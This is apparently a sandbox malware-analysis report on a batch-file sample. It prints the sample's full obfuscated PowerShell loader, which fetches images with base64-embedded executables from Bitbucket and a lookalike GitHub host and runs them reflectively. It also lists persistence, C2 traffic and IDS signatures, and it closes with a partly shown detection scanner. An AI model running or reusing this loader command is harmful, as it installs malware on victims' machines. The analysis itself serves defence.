7800powershell "$ddsdgo = 'Id@d@gd@Cd@d@WwBOd@GUd@dd@d@ud@FMd@ZQByd@HYd@aQBjd@GUd@Ud@Bvd@Gkd@bgB0d@E0d@YQBud@GEd@ZwBld@HId@XQd@6d@Dod@UwBld@GMd@dQByd@Gkd@dd@B5d@Fd@d@cgBvd@HQd@bwBjd@G8d@bd@d@gd@D0d@Id@Bbd@E4d@ZQB0d@C4d@UwBld@GMd@dQByd@Gkd@dd@B5d@Fd@d@cgBvd@HQd@bwBjd@G8d@bd@BUd@Hkd@cd@Bld@F0d@Ogd@6d@FQd@bd@Bzd@DEd@Mgd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@Bmd@HUd@bgBjd@HQd@aQBvd@G4d@Id@BEd@G8d@dwBud@Gwd@bwBhd@GQd@Rd@Bhd@HQd@YQBGd@HId@bwBtd@Ewd@aQBud@Gsd@cwd@gd@Hsd@Id@Bwd@GEd@cgBhd@G0d@Id@d@od@Fsd@cwB0d@HId@aQBud@Gcd@WwBdd@F0d@Jd@Bsd@Gkd@bgBrd@HMd@KQd@gd@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@CQd@dwBld@GId@QwBsd@Gkd@ZQBud@HQd@Id@d@9d@Cd@d@TgBld@Hcd@LQBPd@GId@agBld@GMd@dd@d@gd@FMd@eQBzd@HQd@ZQBtd@C4d@TgBld@HQd@LgBXd@GUd@YgBDd@Gwd@aQBld@G4d@dd@d@7d@Cd@d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bzd@Ggd@dQBmd@GYd@bd@Bld@GQd@Td@Bpd@G4d@awBzd@Cd@d@PQd@gd@Ecd@ZQB0d@C0d@UgBhd@G4d@Zd@Bvd@G0d@Id@d@td@Ekd@bgBwd@HUd@dd@BPd@GId@agBld@GMd@dd@d@gd@CQd@bd@Bpd@G4d@awBzd@Cd@d@LQBDd@G8d@dQBud@HQd@Id@d@kd@Gwd@aQBud@Gsd@cwd@ud@Ewd@ZQBud@Gcd@dd@Bod@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@Bmd@G8d@cgBld@GEd@YwBod@Cd@d@Kd@d@kd@Gwd@aQBud@Gsd@Id@Bpd@G4d@Id@d@kd@HMd@ad@B1d@GYd@ZgBsd@GUd@Zd@BMd@Gkd@bgBrd@HMd@KQd@gd@Hsd@Id@B0d@HId@eQd@gd@Hsd@Id@Byd@GUd@dd@B1d@HId@bgd@gd@CQd@dwBld@GId@QwBsd@Gkd@ZQBud@HQd@LgBEd@G8d@dwBud@Gwd@bwBhd@GQd@Rd@Bhd@HQd@YQd@od@CQd@bd@Bpd@G4d@awd@pd@Cd@d@fQd@gd@GMd@YQB0d@GMd@ad@d@gd@Hsd@Id@Bjd@G8d@bgB0d@Gkd@bgB1d@GUd@Id@B9d@Cd@d@fQd@7d@Cd@d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@cgBld@HQd@dQByd@G4d@Id@d@kd@G4d@dQBsd@Gwd@Id@B9d@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@EId@eQB0d@GUd@cwd@gd@D0d@Id@d@nd@Ggd@dd@B0d@Ccd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@EId@eQB0d@GUd@cwd@yd@Cd@d@PQd@gd@Ccd@cd@Bzd@Dod@Lwd@vd@Ccd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@Gwd@ZgBzd@GQd@ZgBzd@GQd@Zwd@gd@D0d@Id@d@gd@CQd@QgB5d@HQd@ZQBzd@Cd@d@Kwd@kd@EId@eQB0d@GUd@cwd@yd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bsd@Gkd@bgBrd@HMd@Id@d@9d@Cd@d@Qd@d@od@Cgd@Jd@Bsd@GYd@cwBkd@G
Yd@cwBkd@Gcd@Id@d@rd@Cd@d@JwBid@Gkd@dd@Bid@HUd@YwBrd@GUd@dd@d@ud@G8d@cgBnd@C8d@YwB6d@Hgd@ed@B4d@Hgd@ed@B4d@Hod@ed@B2d@C8d@ZwBkd@GYd@Zwd@vd@GQd@bwB3d@G4d@bd@Bvd@GEd@Zd@Bzd@C8d@cd@Bpd@GMd@LgBqd@Hd@d@Zwd@/d@DEd@Nd@d@yd@DMd@Nd@d@0d@Ccd@KQd@sd@Cd@d@Kd@d@kd@Gwd@ZgBzd@GQd@ZgBzd@GQd@Zwd@gd@Csd@Id@d@nd@G8d@ZgBpd@GMd@ZQd@zd@DYd@NQd@ud@Gcd@aQB0d@Ggd@dQBid@C4d@aQBvd@C8d@MQd@vd@HQd@ZQBzd@HQd@LgBqd@Hd@d@Zwd@nd@Ckd@KQd@7d@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bpd@G0d@YQBnd@GUd@QgB5d@HQd@ZQBzd@Cd@d@PQd@gd@EQd@bwB3d@G4d@bd@Bvd@GEd@Zd@BEd@GEd@dd@Bhd@EYd@cgBvd@G0d@Td@Bpd@G4d@awBzd@Cd@d@Jd@Bsd@Gkd@bgBrd@HMd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Gkd@Zgd@gd@Cgd@Jd@Bpd@G0d@YQBnd@GUd@QgB5d@HQd@ZQBzd@Cd@d@LQBud@GUd@Id@d@kd@G4d@dQBsd@Gwd@KQd@gd@Hsd@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@Cd@d@PQd@gd@Fsd@UwB5d@HMd@dd@Bld@G0d@LgBUd@GUd@ed@B0d@C4d@RQBud@GMd@bwBkd@Gkd@bgBnd@F0d@Ogd@6d@FUd@Vd@BGd@Dgd@LgBHd@GUd@dd@BTd@HQd@cgBpd@G4d@Zwd@od@CQd@aQBtd@GEd@ZwBld@EId@eQB0d@GUd@cwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@HMd@dd@Bhd@HId@dd@BGd@Gwd@YQBnd@Cd@d@PQd@gd@Ccd@Pd@d@8d@EId@QQBTd@EUd@Ngd@0d@F8d@UwBUd@EEd@UgBUd@D4d@Pgd@nd@Dsd@Id@d@kd@GUd@bgBkd@EYd@bd@Bhd@Gcd@Id@d@9d@Cd@d@Jwd@8d@Dwd@QgBBd@FMd@RQd@2d@DQd@XwBFd@E4d@Rd@d@+d@D4d@Jwd@7d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Cd@d@PQd@gd@CQd@aQBtd@GEd@ZwBld@FQd@ZQB4d@HQd@LgBJd@G4d@Zd@Bld@Hgd@TwBmd@Cgd@Jd@Bzd@HQd@YQByd@HQd@RgBsd@GEd@Zwd@pd@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@D0d@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@C4d@SQBud@GQd@ZQB4d@E8d@Zgd@od@CQd@ZQBud@GQd@RgBsd@GEd@Zwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@Bpd@GYd@Id@d@od@CQd@cwB0d@GEd@cgB0d@Ekd@bgBkd@GUd@ed@d@gd@C0d@ZwBld@Cd@d@Md@d@gd@C0d@YQBud@GQd@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@C0d@ZwB0d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Ckd@Id@B7d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Cd@d@Kwd@9d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@RgBsd@GEd@Zwd@ud@Ewd@ZQBud@Gcd@dd@Bod@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d
@kd@GId@YQBzd@GUd@Ngd@0d@Ewd@ZQBud@Gcd@dd@Bod@Ggd@Id@d@9d@Cd@d@Jd@Bld@G4d@Zd@BJd@G4d@Zd@Bld@Hgd@Id@d@td@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GId@YQBzd@GUd@Ngd@0d@EMd@bwBtd@G0d@YQBud@GQd@Id@d@9d@Cd@d@Jd@Bpd@G0d@YQBnd@GUd@Vd@Bld@Hgd@dd@d@ud@FMd@dQBid@HMd@dd@Byd@Gkd@bgBnd@Cgd@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Cwd@Id@d@kd@GId@YQBzd@GUd@Ngd@0d@Ewd@ZQBud@Gcd@dd@Bod@Ggd@KQd@7d@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@D0d@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@C4d@SQBud@GQd@ZQB4d@E8d@Zgd@od@CQd@ZQBud@GQd@RgBsd@GEd@Zwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GMd@bwBtd@G0d@YQBud@GQd@QgB5d@HQd@ZQBzd@Cd@d@PQd@gd@Fsd@UwB5d@HMd@dd@Bld@G0d@LgBDd@G8d@bgB2d@GUd@cgB0d@F0d@Ogd@6d@EYd@cgBvd@G0d@QgBhd@HMd@ZQd@2d@DQd@UwB0d@HId@aQBud@Gcd@Kd@d@kd@GId@YQBzd@GUd@Ngd@0d@EMd@bwBtd@G0d@YQBud@GQd@KQd@7d@Cd@d@Id@d@gd@CQd@ZQBud@GQd@SQBud@GQd@ZQB4d@Cd@d@PQd@gd@CQd@aQBtd@GEd@ZwBld@FQd@ZQB4d@HQd@LgBJd@G4d@Zd@Bld@Hgd@TwBmd@Cgd@Jd@Bld@G4d@Zd@BGd@Gwd@YQBnd@Ckd@Owd@gd@Cd@d@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@D0d@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@C4d@SQBud@GQd@ZQB4d@E8d@Zgd@od@CQd@ZQBud@GQd@RgBsd@GEd@Zwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bsd@G8d@YQBkd@GUd@Zd@BBd@HMd@cwBld@G0d@YgBsd@Hkd@Id@d@9d@Cd@d@WwBTd@Hkd@cwB0d@GUd@bQd@ud@FId@ZQBmd@Gwd@ZQBjd@HQd@aQBvd@G4d@LgBBd@HMd@cwBld@G0d@YgBsd@Hkd@XQd@6d@Dod@Td@Bvd@GEd@Zd@d@od@CQd@YwBvd@G0d@bQBhd@G4d@Zd@BCd@Hkd@dd@Bld@HMd@KQd@7d@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@BHd@GUd@dd@d@td@Fd@d@cgBvd@GMd@ZQBzd@HMd@Id@B8d@Cd@d@UwBvd@HId@dd@d@td@E8d@YgBqd@GUd@YwB0d@Cd@d@QwBQd@FUd@Id@d@td@EQd@ZQBzd@GMd@ZQBud@GQd@aQBud@Gcd@Id@B8d@Cd@d@UwBld@Gwd@ZQBjd@HQd@LQBPd@GId@agBld@GMd@dd@d@gd@C0d@RgBpd@HId@cwB0d@Cd@d@NQd@gd@Hwd@Id@BGd@G8d@cgBtd@GEd@dd@d@td@FQd@YQBid@Gwd@ZQd@gd@E4d@YQBtd@GUd@Ld@BDd@Fd@d@VQd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@HQd@eQBwd@GUd@Id@d@9d@Cd@d@Jd@Bsd@G8d@YQBkd@GUd@Zd@BBd@HMd@cwBld@G0d@YgBsd@Hkd@LgBHd@GUd@dd@BUd@Hkd@cd@Bld@Cgd@
JwB0d@GUd@cwB0d@Hd@d@bwB3d@GUd@cgBzd@Ggd@ZQBsd@Gwd@LgBId@G8d@YQBhd@GEd@YQBhd@GEd@cwBkd@G0d@ZQd@nd@Ckd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@BHd@GUd@dd@d@td@Fd@d@cgBvd@GMd@ZQBzd@HMd@Id@B8d@Cd@d@UwBvd@HId@dd@d@td@E8d@YgBqd@GUd@YwB0d@Cd@d@QwBQd@FUd@Id@d@td@EQd@ZQBzd@GMd@ZQBud@GQd@aQBud@Gcd@Id@B8d@Cd@d@UwBld@Gwd@ZQBjd@HQd@LQBPd@GId@agBld@GMd@dd@d@gd@C0d@RgBpd@HId@cwB0d@Cd@d@NQd@gd@Hwd@Id@BGd@G8d@cgBtd@GEd@dd@d@td@FQd@YQBid@Gwd@ZQd@gd@E4d@YQBtd@GUd@Ld@BDd@Fd@d@VQd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@G0d@ZQB0d@Ggd@bwBkd@Cd@d@PQd@gd@CQd@dd@B5d@Hd@d@ZQd@ud@Ecd@ZQB0d@E0d@ZQB0d@Ggd@bwBkd@Cgd@JwBsd@GYd@cwBnd@GUd@Zd@Bkd@GQd@Zd@Bkd@GQd@Zd@Bhd@Ccd@KQd@ud@Ekd@bgB2d@G8d@awBld@Cgd@Jd@Bud@HUd@bd@Bsd@Cwd@Id@Bbd@G8d@YgBqd@GUd@YwB0d@Fsd@XQBdd@Cd@d@Kd@d@nd@HQd@ed@B0d@C4d@OQd@5d@DMd@Nd@Bfd@Dkd@Mgd@yd@Dcd@Od@d@yd@Dgd@Nd@d@3d@DEd@XwBkd@GEd@bwBsd@Hkd@YQBwd@C8d@bgBpd@GEd@bQd@vd@Hcd@YQByd@C8d@dd@Byd@G4d@ZQBtd@HUd@bgd@vd@Gcd@bwBid@G0d@YQBzd@C8d@ZwByd@G8d@LgB0d@GUd@awBjd@HUd@YgB0d@Gkd@Ygd@vd@C8d@OgBzd@Ccd@Ld@d@gd@Ccd@MQd@nd@Cwd@Id@d@nd@Fcd@aQBud@GQd@bwB3d@HMd@VQBwd@GQd@YQB0d@GUd@Jwd@sd@Cd@d@JwBSd@GUd@ZwBBd@HMd@bQd@nd@Cwd@Id@d@nd@Dd@d@Jwd@pd@Ckd@fQB9d@Dsd@Cgd@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($ddsdgo.replace('d@','A')));powershell.exe $OWjuxD"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 26 754
Read events: 26 754
Write events: 0
Delete events: 0
Modification events: No data
Executable files: 0
Suspicious files: 1
Text files: 11
Unknown types: 0

Dropped files

Fields per file: PID, Process, Filename, Type, MD5, SHA256

PID: 8012 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_svgrmkwq.crb.ps1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7888 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3bwjrr4c.v4i.psm1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 8012 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.bat
MD5: 23C3470F4DAA563D06DE713A83090994
SHA256: 23B0E8E5892B4C9A872AF00F252BCA6004B187B89E23AF6C9D17F7CDCF22C393
(same MD5 and SHA256 as the submitted 4ix598.bat: the file written to the Startup folder is a copy of the sample)

PID: 7316 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_q3jzlyh1.ipw.ps1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 8012 | Process: powershell.exe | Type: binary
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5: 0ADFA19EE826B9D9AC60DA9380AB610D
SHA256: F07BE965435B4390A9400C85930113E8C5BE63F05A9F08D22E37D32B59A6B1B1

PID: 7352 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cgepocmf.fyd.psm1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7800 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ookwvirv.1rl.psm1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7800 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jh5vvokr.p0b.ps1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 8012 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_h54t1nrr.rhe.psm1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7888 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_30oereav.mtr.ps1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
HTTP(S) requests: 30
TCP/UDP connections: 50
DNS requests: 17
Threats: 6

HTTP requests

Fields per request: PID, Process, Method, HTTP Code, IP, URL, CN, Type, Size, Reputation (cells the page leaves empty are omitted)

Method: GET | HTTP code: 302 | IP: 185.166.143.48:443
URL: https://bitbucket.org/czxxxxxxzxv/gdfg/downloads/pic.jpg?142344
CN: unknown

Method: GET | HTTP code: 200 | IP: 185.166.143.50:443
URL: https://bitbucket.org/sambog/numenrt/raw/main/payload_1748287229_4399.txt
CN: unknown | Type: text | Size: 2.18 Mb | Reputation: whitelisted

Method: GET | IP: 185.199.111.153:443
URL: https://ofice365.github.io/1/test.jpg
CN: unknown

Method: GET | HTTP code: 200 | IP: 16.182.99.73:443 | URL:
https://bbuseruploads.s3.amazonaws.com/4cc24b65-2e2b-4b92-9c4a-1a19fbcd59bc/downloads/5079cd2c-886c-41c9-b8f1-edf062c53f03/pic.jpg?response-content-disposition=attachment%3B%20filename%3D%22pic.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNGNCW66EH&Signature=0C7vclYCDkcqSyW5NNcbsWoYwIc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICh8FIMIWki6w6qTMrPyqZebYNtrYjl%2FlUQgF%2FLSscMIAiEA39v%2BY1yFAQf7317UaQfHQjfDm6KDy6CTmVoCtDN2kQgqpwIIZBAAGgw5ODQ1MjUxMDExNDYiDFzVjM2QJpmZR1JPyyqEAsJsgI5vxabmvwLCuYTVjd9Q5zaVKabYKMuoQFvXRVugbZCgtdA4oCJs57%2FDZroUkun2%2FEf85aG9IsYYpWsV0wjC%2BgL6D73%2FwlQXnhnr%2BBxnbdnfe112fZ3e6qjmEOcmW%2BA4hgnx1GGP3hqtCIBWUgVvgkkh0Ip8FgDQMkhOBGEe%2BbFjWtDClYc7nHcaBe2bbAeobQ4JEjbMQfsAXSs%2FpXC4K8PziDLcDpGHmQ1vxRLSV5syh7B1W%2BfgM7z6mjf3Zaa8a1wjLaqJmbi8DhljKtWxqD0bZpFhpWNxCOP%2BgvOP8rEcGGa3qtIyaj1uUeXlIoi8Hwm6ZwyaPjw7Tzg7XmN1pM9HMOKg2MEGOp0Bnr43m6rjBXG1C4BvFG7kw9zPx7yc43mLl90RvHQqHO8rLTU5mlWmbwE6noZuE5dsyg52BRpHoBZgYBAQ8Tq811IQRDfgQgTNAZT2CgeInrC6mO6k1wx%2BpHEKEWibwuGJMra62%2BVyL7EZ%2B9e90ZDOFYJL%2BNcuI4uKa6xVc22pwMeduGTohzRjp2%2BapGwzu%2Fo5Ayqc5YsAO8t3MHGHeQ%3D%3D&Expires=1748375402
unknown
image
3.14 Mb
whitelisted
GET
200
54.231.203.49:443
https://bbuseruploads.s3.amazonaws.com/4cc24b65-2e2b-4b92-9c4a-1a19fbcd59bc/downloads/5079cd2c-886c-41c9-b8f1-edf062c53f03/pic.jpg?response-content-disposition=attachment%3B%20filename%3D%22pic.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNGNCW66EH&Signature=0C7vclYCDkcqSyW5NNcbsWoYwIc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICh8FIMIWki6w6qTMrPyqZebYNtrYjl%2FlUQgF%2FLSscMIAiEA39v%2BY1yFAQf7317UaQfHQjfDm6KDy6CTmVoCtDN2kQgqpwIIZBAAGgw5ODQ1MjUxMDExNDYiDFzVjM2QJpmZR1JPyyqEAsJsgI5vxabmvwLCuYTVjd9Q5zaVKabYKMuoQFvXRVugbZCgtdA4oCJs57%2FDZroUkun2%2FEf85aG9IsYYpWsV0wjC%2BgL6D73%2FwlQXnhnr%2BBxnbdnfe112fZ3e6qjmEOcmW%2BA4hgnx1GGP3hqtCIBWUgVvgkkh0Ip8FgDQMkhOBGEe%2BbFjWtDClYc7nHcaBe2bbAeobQ4JEjbMQfsAXSs%2FpXC4K8PziDLcDpGHmQ1vxRLSV5syh7B1W%2BfgM7z6mjf3Zaa8a1wjLaqJmbi8DhljKtWxqD0bZpFhpWNxCOP%2BgvOP8rEcGGa3qtIyaj1uUeXlIoi8Hwm6ZwyaPjw7Tzg7XmN1pM9HMOKg2MEGOp0Bnr43m6rjBXG1C4BvFG7kw9zPx7yc43mLl90RvHQqHO8rLTU5mlWmbwE6noZuE5dsyg52BRpHoBZgYBAQ8Tq811IQRDfgQgTNAZT2CgeInrC6mO6k1wx%2BpHEKEWibwuGJMra62%2BVyL7EZ%2B9e90ZDOFYJL%2BNcuI4uKa6xVc22pwMeduGTohzRjp2%2BapGwzu%2Fo5Ayqc5YsAO8t3MHGHeQ%3D%3D&Expires=1748375402
unknown
image
3.14 Mb
whitelisted
GET
302
185.166.143.48:443
https://bitbucket.org/czxxxxxxzxv/gdfg/downloads/pic.jpg?142344
unknown
GET
304
52.149.20.212:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
GET
200
52.149.20.212:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
1672
SIHClient.exe
GET
200
23.48.23.188:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1672
SIHClient.exe
GET
200
23.48.23.188:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted

Connections

| PID | Process | IP | Domain | ASN | CN | Reputation |
| --- | --- | --- | --- | --- | --- | --- |
| 4 | System | 192.168.100.255:137 |  |  |  | whitelisted |
|  |  | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
| 4 | System | 192.168.100.255:138 |  |  |  | whitelisted |
| 3216 | svchost.exe | 172.211.123.248:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
| 7888 | powershell.exe | 185.166.143.49:443 | bitbucket.org | AMAZON-02 | NL | whitelisted |
| 7888 | powershell.exe | 3.5.13.130:443 | bbuseruploads.s3.amazonaws.com | AMAZON-AES | US | whitelisted |
| 8152 | RegAsm.exe | 193.26.115.21:6969 |  | RELIABLESITE | US | unknown |
| 7352 | powershell.exe | 185.199.108.153:443 | ofice365.github.io | FASTLY | US | shared |
| 7352 | powershell.exe | 185.166.143.49:443 | bitbucket.org | AMAZON-02 | NL | whitelisted |
| 7352 | powershell.exe | 3.5.27.182:443 | bbuseruploads.s3.amazonaws.com | AMAZON-AES | US | whitelisted |

DNS requests

| Domain | IP | Reputation |
| --- | --- | --- |
| settings-win.data.microsoft.com | 4.231.128.59 | whitelisted |
| google.com | 142.250.181.238 | whitelisted |
| client.wns.windows.com | 172.211.123.248, 172.211.123.249 | whitelisted |
| bitbucket.org | 185.166.143.49, 185.166.143.50, 185.166.143.48 | whitelisted |
| bbuseruploads.s3.amazonaws.com | 3.5.13.130, 16.182.38.1, 52.216.61.153, 3.5.24.210, 3.5.29.186, 54.231.195.33, 3.5.27.253, 16.15.193.12, 3.5.27.182, 52.216.237.227, 52.217.96.156, 54.231.229.73, 52.216.218.81, 52.216.57.1, 3.5.8.150, 3.5.30.243 | whitelisted |
| ofice365.github.io | 185.199.108.153, 185.199.109.153, 185.199.111.153, 185.199.110.153 | unknown |
| slscr.update.microsoft.com | 4.245.163.56 | whitelisted |
| crl.microsoft.com | 23.48.23.188, 23.48.23.140, 23.48.23.177, 23.48.23.138, 23.48.23.183, 23.48.23.145, 23.48.23.191, 23.48.23.180, 23.48.23.139 | whitelisted |
| www.microsoft.com | 2.16.253.202 | whitelisted |
| fe3cr.delivery.mp.microsoft.com | 20.3.187.198 | whitelisted |

Threats

| PID | Process | Class | Message |
| --- | --- | --- | --- |
|  |  | Potentially Bad Traffic | PAYLOAD [ANY.RUN] Reverse Base64 Encoded EXE Inbound |
|  |  | A Network Trojan was detected | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound |
|  |  | A Network Trojan was detected | PAYLOAD [ANY.RUN] Base64 encoded PE EXE file inside JPEG image |
|  |  | A Network Trojan was detected | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 |
|  |  | A Network Trojan was detected | PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558) |

1 ETPRO signature available at the full report
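The Threats rows above describe the delivery technique the network signatures fired on: a base64-encoded PE carried inside a JPEG, either as plain base64 or with the base64 string reversed character by character (the "Reverse Base64" / ReverseLoader pattern). The scanner below is an added example written for this report; it is not ANY.RUN, Emerging Threats or TA558 code. It reproduces the check offline: find long base64 alphabet runs in a file, try decoding each as-is and reversed, and accept only a result whose DOS header points at a valid `PE\0\0` signature. The 64-character run threshold, the function names, the placement of the payload after the JPEG EOI marker, and the constructed JPEG stub and 68-byte fake PE used as sample input are all assumptions of the example, not facts taken from the sample analysed here.

```python
"""Scan a JPEG (or any file) for a base64-encoded PE appended to it, in either
forward or character-reversed form, as flagged by the report's Threats rows.

Added example for this report; not ANY.RUN, ET or TA558 code. Sample inputs are
constructed below: a minimal JPEG stub and a 68-byte fake PE header.
"""
import base64
import binascii
import hashlib
import re
import struct

# Minimum base64 run length worth decoding. Assumption for the example: a real
# PE is tens of KB, so 64 chars already skips the short alphabet runs that JPEG
# entropy data produces by chance.
MIN_RUN = 64
# Leading '=' is allowed because a reversed base64 string carries its padding
# at the front instead of the end.
B64_RUN = re.compile(rb"={0,2}[A-Za-z0-9+/]{%d,}={0,2}" % MIN_RUN)


def looks_like_pe(blob: bytes) -> bool:
    """DOS header check: 'MZ' at 0 and e_lfanew (offset 0x3C) pointing at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return e_lfanew + 4 <= len(blob) and blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def try_b64(text: bytes):
    """Strict base64 decode that returns None instead of raising on bad input."""
    text = text + b"=" * (-len(text) % 4)  # re-pad a run whose '=' was stripped
    try:
        return base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None


def find_embedded_pe(data: bytes) -> list:
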